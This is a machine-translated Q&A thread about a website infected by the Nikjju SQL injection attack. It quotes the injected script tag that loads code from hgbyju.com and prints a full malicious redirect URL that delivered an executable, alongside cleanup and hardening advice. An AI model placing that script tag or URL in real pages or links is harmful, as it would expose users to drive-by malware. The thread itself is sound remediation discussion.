1

私はサイトhttp://palacechemicals.co.uk/で作業していますが、悪意のある (しかし無害な) JavaScript の行に何らかの形で感染しています:

</title><script src=http://hgbyju.com/r.php ></script>

251行目。スクリプトが読み込もうとする URL は 404 を返しますが、Google はまだマルウェア リストに登録しています。

ここの別のマシンにクリーンで機能するローカルコピーがあり、各フォルダーのファイルサイズを手動とソフトウェアの両方で比較しましたが、2つは同じです。また、データを MSSQL Server 2008 にインポートするために使用される SQL を、eval、script などのさまざまな文字列について何度も検索しました。

私は本当に困惑しており、次に何を探すべきかについてのアイデアがありません.

他の誰かがこの問題を抱えていましたか、または次の一連の行動をお勧めできますか?

ホスティング プロバイダーが何らかの形で感染している可能性はありますか? 私たちは共有ホスティング プラットフォームを使用していますが、ホストはかなり大きく、評判が良いです。

任意の入力をいただければ幸いです。ありがとうございました。

4

6 に答える 6

2

Chrome からサイトにアクセスしても、何も起こりません。しかし、Firefox からアクセスすると、スクリプト リンクはステータス 404 を返しません。エマ ワトソンのビデオを含む「YouTube」にリダイレクトする悪意のあるスクリプトがあります。

それは一度だけ起こりました。2回目はまた404です。別のIPアドレスから再現してみます。

リダイレクトされた場所は次のとおりです。

http://www1.thebest-scanerjjn.it.cx/o9gzj2z?2nvq3n=Vtfn5per7tvJzNjp1VPozMWrmqicnZSi19quZpTVysfUosXIeJnP1KuXppuQ3aWr7edqlNbRyZ%2FH0rpzmdLQ36Ld09jkpOOc1JaruLOLy9WwrF2hmZSclqKhmJ9jopzkp8%2Fo3diflpnrltegl6eL5t7Wq2ufpqaYoqadl5KWmeigsJSUoZmrnJ%2BjZJ%2Bc1aLb1dHTn9zq62Ch1sLUyuLU2NOm5eXjnpzX19KI1NTZm%2Bugw9zH6eOQ4JfUs9mn4uSNmKOKpbpSpanRz9HTzc%2FRmtPj2pbP4NuTxdSh6ZiYlaeS

そこに行かないでください。ダウンロードしようとしている実行可能ファイルがあり、他に何があるかはわかりません。

したがって、スクリプトは機能しますが、常に 404 を返すとは限りません。悪意のあるリンクを削除した後、サイトのセキュリティを真剣に確認する必要があります。

  • すべてのパスワードを変更します。
  • CMS を使用している場合は、最新バージョンに更新してください。
  • 自社開発の Web サイトの場合は、SQL インジェクションやその他の種類のセキュリティ違反がないか監査します。
于 2012-04-20T12:40:09.457 に答える
1

これ以上の情報がなければ、最も単純な原因は最も可能性が高いと思います。パスワードが侵害され、攻撃者がスクリプトを直接変更したためです。

  • その行を含むページ/スクリプトを修正します。これは、念のため、クリーンコピーからサイト全体をリロードすることを意味する場合があります。攻撃者は、ファイルをその場で変更するスクリプトを持っている可能性があります。
  • 強力なパスワードを使用して、すべての管理パスワードを変更します。

[私は常に強力なパスワードを使用しましたが、少なくとも1つのサイトをファイルサーバーとして使用しました。攻撃者は私の何も変更しませんでしたが、変更できた可能性があります。コンテンツを削除してパスワードを変更することで、今のところそれが修正されたようです。]

于 2012-04-20T12:45:59.077 に答える
1

あなたのサイトは SQLi に対して脆弱であるため、何度も感染しています。

よろしくDeltaR

于 2012-04-23T10:50:49.297 に答える
1

クリア テキストを検索する代わりに、HTML エンティティを 10 進数と 16 進数で検索する必要があります。

例えば:

&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;は16進数です script

&#x003c;&#x003e;は16進数です<>

.NET 3.5 で WebForms を使用していて、入力文字列を適切にサニタイズしていない場合、スクリプト インジェクションの大きな可能性があります。いずれかのページでリクエストの検証をオフにしている場合は、これらのページを次のような代替入力に対してテストする必要があります。

eval個人的には、感染したページのすべてのデータ駆動型入力を調べて、そのデータをスキャンして、や などの一般的な単語だけでなく、html エンティティを探しますscript

編集: html エンティティは常に で始まる必要があります&#。これにより、16 進数、10 進数、Unicode などでキーワードを検索するよりも検索が容易になります。

于 2012-04-20T12:55:45.850 に答える
1

ホスティング プロバイダーが何らかの形で感染している可能性はありますか? 私たちは共有ホスティング プラットフォームを使用していますが、ホストはかなり大きく、評判が良いです。

サイトのChrome マルウェア診断を読みますAS15418 (FASTHOSTS)への診断のリンクをクリックすると、ホスティング サービスに多数のサイトが感染していることがわかります。

このネットワークでホストされているサイトに Google がアクセスするとどうなりますか?

過去 90 日間にこのネットワークでテストした 45254 サイトのうち、lalydesign.co.uk /、consolegaming.eu/、nimbiz.com/ などを含む885 サイトで、悪意のあるソフトウェアがユーザーの同意なしにダウンロードおよびインストールされる。

Google がこのネットワーク上のサイトを最後にテストしたのは 2012 年 4 月 23 日で、疑わしいコンテンツが最後に見つかったのは 2012 年 4 月 23 日でした。

...

このネットワークは、マルウェアを配布したサイトをホストしていましたか?

はい、このネットワークは、過去 90 日間に悪意のあるソフトウェアを配布したサイトをホストしていました。たとえば、hipsxpress.co.uk/、qpscars.co.uk/、aroundbritain.co.uk/ を含む 35 のサイトが、meb などの他の 58 のサイトに感染していることがわかりまし。 gov.tr/、opes.go.th/、stephenbrowning.co.uk/。

私の推測では、セキュリティの問題を解決するか、ホスティング サービスを変更するように圧力をかける必要があります ( edit )。

于 2012-04-23T14:14:57.657 に答える
0

この攻撃により、多くのサイトが危険にさらされています。脆弱なASPサイトを標的とするサイバー犯罪者。

ハッカーは、サイトのSQLインジェクションの脆弱性を悪用して、このコードをサイトに挿入しました。

セキュリティのヒント:

  • コードの分析: サイトのすべてのページのソースコードを確認します。単にスクリプトを検索するのではなく、各行を読んでください。疑わしいコードを見つけて削除します(コードではないことを確認してください)。注:一部のスクリプトはエンコードされている可能性があるため、コードを注意深く確認してください。

  • ディレクトリ内のファイル:ホスティングディレクトリ内に疑わしいファイルがないか確認します。

  • 脆弱性にパッチを当てる:ハッカーはSQLiの脆弱性を悪用してこのコードを挿入しました。したがって、サイトの脆弱な部分を見つけて修正してみてください。これを行う方法がわからない場合は、セキュリティの専門家を雇ってください。また、いくつかの自動sqliスキャナーを使用して脆弱性を見つけることができます(ただし、100%正確ではありません)。

  • パスワードを変更する:脆弱性にパッチを適用したら、ホスティング、ftp、mysqlのパスワードを変更します。他の場所で同じパスワードを使用している場合は、それらも変更してください。

情報: 上記のインジェクションは一般にNikjju攻撃として知られています。詳細については、NikjjuSql インジェクション攻撃と悪意のあるドメインを参照してください。

于 2012-05-12T09:19:18.493 に答える